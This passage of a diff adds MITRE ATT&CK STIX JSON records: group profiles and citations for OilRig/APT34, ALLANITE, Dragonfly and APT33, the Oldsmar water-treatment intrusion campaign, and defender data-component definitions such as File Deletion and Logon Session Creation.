[ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0049", + "external_id": "G0049" + }, + { + "source_name": "IRN2", + "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "OilRig", + "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)" + }, + { + "source_name": "COBALT GYPSY", + "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)" + }, + { + "source_name": "Helix Kitten", + "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "Evasive Serpens", + "description": "(Citation: Unit42 OilRig Playbook 2023)" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). 
Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + }, + { + "source_name": "ClearSky OilRig Jan 2017", + "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.", + "url": "http://www.clearskysec.com/oilrig/" + }, + { + "source_name": "Palo Alto OilRig May 2016", + "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + }, + { + "source_name": "Palo Alto OilRig April 2017", + "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" + }, + { + "source_name": "Palo Alto OilRig Oct 2016", + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + }, + { + "source_name": "Unit 42 QUADAGENT July 2018", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" + }, + { + "source_name": "Crowdstrike Helix Kitten Nov 2018", + "description": "Meyers, A. (2018, November 27). 
Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Secureworks COBALT GYPSY Threat Profile", + "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" + }, + { + "source_name": "APT34", + "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + }, + { + "source_name": "Unit42 OilRig Playbook 2023", + "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. 
Retrieved February 6, 2023.", + "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Modification", + "description": "Changes made to a drive letter or mount point of a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-21T21:47:58.629Z", + "name": "Asset Inventory", + "description": "This includes sources of current and expected devices on the network, including the manufacturer, model, and necessary identifiers (e.g., IP and hardware addresses)", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "created": "2022-09-23T16:34:00.912Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-21T15:56:01.070Z", + "name": "Oldsmar Treatment Plant Intrusion", + "description": "[Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009) was a cyber incident involving a water treatment facility in Florida. During this incident, unidentified threat actors leveraged features of the system to access and modify setpoints for a specific chemical required in the treatment process. The incident was detected immediately and prevented before it could cause any harm to the public.(Citation: Pinellas County Sheriffs Office February 2021)(Citation: CISA AA21-042A Water Treatment Intrusion Feb 2021)(Citation: Dragos Oldsmar Feb 2021)", + "aliases": [ + "Oldsmar Treatment Plant Intrusion" + ], + "first_seen": "2021-02-01T05:00:00.000Z", + "last_seen": "2021-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_last_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "created": "2022-09-20T20:53:14.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0009", + "external_id": "C0009" + }, + { + "source_name": "CISA AA21-042A Water Treatment Intrusion Feb 2021", + "description": "CISA. (2021, February 11). Compromise of U.S. Water Treatment Facility . Retrieved October 18, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-042a" + }, + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 
2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + }, + { + "source_name": "Dragos Oldsmar Feb 2021", + "description": "Serino, G., et al . (2021, February 8). Recommendations Following the Oldsmar Water Treatment Facility Cyber Attack. Retrieved October 21, 2022.", + "url": "https://www.dragos.com/blog/industry-news/recommendations-following-the-oldsmar-water-treatment-facility-cyber-attack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + }, + { + "modified": "2023-04-21T15:41:36.287Z", + "name": "OS API Execution", + "description": "Operating system function/method calls executed by a process", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "ALLANITE", + "Palmetto Fusion" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1000", + "url": 
"https://attack.mitre.org/groups/G1000" + }, + { + "source_name": "Dragos", + "url": "https://dragos.com/resource/allanite/", + "description": "Dragos Allanite Retrieved. 2019/10/27 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group's tactics and techniques are reportedly similar to [Dragonfly](https://attack.mitre.org/groups/G0035), although [ALLANITE](https://attack.mitre.org/groups/G1000)s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence. (Citation: Dragos)", + "modified": "2022-05-24T19:26:10.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "ALLANITE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection 
Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:03:28.170Z", + "name": "Dragonfly", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)", + "aliases": [ + "Dragonfly", + "TEMP.Isotope", + "DYMALLOY", + "Berserk Bear", + "TG-4192", + "Crouching Yeti", + "IRON LIBERTY", + "Energetic Bear" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", 
+ "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "created": "2017-05-31T21:32:05.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0035", + "external_id": "G0035" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TEMP.Isotope", + "description": "(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)" + }, + { + "source_name": "Crouching Yeti", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TG-4192", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Dragonfly", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Energetic Bear", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 
2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "CISA AA20-296A Berserk Bear December 2020", + "description": "CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions" + }, + { + "source_name": "DOJ Russia Targeting Critical Infrastructure March 2022", + "description": "Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.", + "url": "https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" + }, + { + "source_name": "Dragos DYMALLOY ", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.", + "url": "https://www.dragos.com/threat/dymalloy/" + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Mandiant Ukraine Cyber Threats January 2022", + "description": "Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.", + "url": "https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" + }, + { + "source_name": "Secureworks MCMD July 2019", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. 
Retrieved August 13, 2020.", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis" + }, + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" + }, + { + "source_name": "Secureworks Karagany July 2019", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": "Symantec Dragonfly 2.0 October 2017", + "description": "Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. 
Retrieved April 19, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + }, + { + "source_name": "UK GOV FSB Factsheet April 2022", + "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", + "url": "https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:07:25.123Z", + "name": "APT33", + "description": "[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. 
(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "aliases": [ + "APT33", + "HOLMIUM", + "Elfin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0064", + "external_id": "G0064" + }, + { + "source_name": "APT33", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "HOLMIUM", + "description": "(Citation: Microsoft Holmium June 2020)" + }, + { + "source_name": "Elfin", + "description": "(Citation: Symantec Elfin Mar 2019)" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + }, + { + "source_name": "Microsoft Holmium June 2020", + "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. 
Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Symantec Elfin Mar 2019", + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Access", + "description": "Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Metadata", + "description": "Contextual data about a file, which may include information such as name, the 
content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Firmware Modification", + "description": "Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)", + "x_mitre_data_source_ref": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Deletion", + "description": "Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 
"x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Creation", + "description": "Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:18:20.802Z", + "name": "Logon Session Creation", + "description": "Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Network Share Access", + "description": "Opening a network share, which makes the contents available to the requestor (ex: Windows EID 
5140 or 5145)", + "x_mitre_data_source_ref": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.805Z", + "name": "File Deletion", + "description": "Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-28T20:49:53.223Z", + "name": "GOLD SOUTHFIELD", + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. 
